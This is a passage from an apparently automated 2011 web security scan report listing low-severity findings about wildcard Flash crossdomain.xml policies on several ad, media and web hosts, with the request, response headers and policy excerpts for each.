<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

7.108. http://ads.masslive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.masslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.masslive.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:01:18 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 08:56:10 GMT
ETag: "38410f-284-9fd87e80"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:18 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

7.109. http://ads.mlive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.mlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.mlive.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:01:28 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 09:02:58 GMT
ETag: "2f0192-284-b82a1480"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:28 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

7.110. http://ads.oregonlive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.oregonlive.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:00:11 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 09 Jun 2011 07:11:24 GMT
ETag: "4b420a-284-292bbf00"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:10:11 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

7.111. http://adscontent2.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adscontent2.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adscontent2.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 308
Content-Type: text/xml
Last-Modified: Wed, 10 Nov 2010 07:01:32 GMT
Accept-Ranges: bytes
ETag: "8450281ba580cb1:4c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=31104000
Date: Sun, 04 Sep 2011 02:30:31 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com"/>
<allow-access-from domain="*.timesgroup.com"/>
<allow-access-from domain="192.168.25.113"/>
<allow-http-request-headers-from do
...[SNIP]...

7.112. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 03:59:45 GMT
Date: Sun, 04 Sep 2011 03:59:45 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 740

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.113. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:31 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sun, 04 Sep 2011 03:41:13 +0000 GMT
Etag: f4d1a9fc456c2b271298cb808b442d20
X-Served-By: h02

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

7.114. http://as.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.serving-sys.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 116
Content-Type: text/xml
Last-Modified: Wed, 25 Jun 2008 14:19:50 GMT
Accept-Ranges: bytes
ETag: "94b48487ced6c81:1c7e7"
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8

<cross-domain-policy>
<allow-access-from domain="*.serving-sys.com" secure="false" />
</cross-domain-policy>


7.115. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:43:39 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

7.116. http://cricket.iphone.stats.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cricket.iphone.stats.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cricket.iphone.stats.com
Proxy-Connection: keep-alive
Referer: http://cricket.widgets.stats.com/ndtv_wc/ndtv_wc-control.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 824
Content-Type: text/xml
Last-Modified: Mon, 18 Apr 2011 06:17:03 GMT
Accept-Ranges: bytes
ETag: "0ef323c90fdcb1:900"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:44:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="demo.sportzinteractive.net"/>
<allow-access-from domain="stage.sports.ndtv.com"/>
<allow-access-from domain="sports.ndtv.com"/>
<allow-access-from domain="sportz.ndtv.com"/>
<allow-access-from domain="castrol.cricket.sportzdeck.stats.com"/>
<allow-access-from domain="castrol.cricket.widgets.stats.com"/>
<allow-access-from domain="ndtv.com"/>
<allow-access-from domain="drop.ndtv.com"/>
<allow-access-from domain="cricket.widgets.stats.com"/>
<allow-access-from domain="ndtvsports.cricket.sportzdeck.stats.com"/>
<allow-access-from domain="*.ndtv.com"/>
<allow-access-from domain="demo.sportcentre.stats.com"/>
<allow-access-from domain="sportcentre.stats.com"/>
...[SNIP]...

7.117. http://developers.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.45.202
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

7.118. http://ecx.images-amazon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ecx.images-amazon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecx.images-amazon.com

Response

HTTP/1.0 200 OK
Server: Server
Content-Length: 710
Last-Modified: Thu, 23 Oct 2008 22:36:17 GMT
Content-Type: text/xml
Cneonction: close
X-Cache-Lookup: HIT from cdn-images.amazon.com:8080
X-Cache-Lookup: MISS from cdn-images.amazon.com:10080
Date: Sun, 04 Sep 2011 02:31:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.images-amazon.com"/>
<allow-access-from domain="images.amazon.com"/>
<allow-access-from domain="g-images.amazon.com"/>
<allow-access-from domain="*.ssl-images-amazon.com"/>
<allow-access-from domain="*.amazon.com"/>
<allow-access-from domain="*.bebe.com"/>
<allow-access-from domain="cea.target.com"/>
<allow-access-from domain="xyccea.target.com"/>
<allow-access-from domain="testcea.target.com"/>
<allow-access-from domain="devcea.target.com"/>
<allow-access-from domain="sites.target.com"/>
...[SNIP]...

7.119. http://fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:15:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 11:15:20 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

7.120. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:16:16 GMT
Expires: Sun, 04 Sep 2011 23:16:16 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 17931
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

7.121. http://images.photogallery.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.photogallery.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.photogallery.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 854
Content-Type: text/xml
Last-Modified: Fri, 23 Jan 2009 11:48:25 GMT
Accept-Ranges: bytes
ETag: "3b52d87f507dc91:11fb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=259191
Date: Sun, 04 Sep 2011 02:37:38 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com" secure="true" />
<allow-access-from domain="*.timesgroup.com" secure="true" />
<allow-access-from domain="*.timesofindia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.economictimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ethindi.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.etgujarati.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.idiva.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.itimes.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotklix.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="*.absoluteradio.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="*.indiatimes.co.in" secure="true" />
...[SNIP]...

7.122. http://login.dotomi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:24:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s01
Last-Modified: Thu, 02 Sep 2010 18:25:52 GMT
ETag: "c948074-a1-48f4af1af6c00"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

7.123. http://netspiderads2.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://netspiderads2.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: netspiderads2.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31104000
Content-Length: 308
Content-Type: text/xml
Last-Modified: Wed, 10 Nov 2010 07:01:03 GMT
Accept-Ranges: bytes
ETag: "3724d79a580cb1:4a2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:30:26 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.indiatimes.com"/>
<allow-access-from domain="*.timesgroup.com"/>
<allow-access-from domain="192.168.25.112"/>
<allow-http-request-headers-from do
...[SNIP]...

7.124. http://netspiderads3.indiatimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://netspiderads3.indiatimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

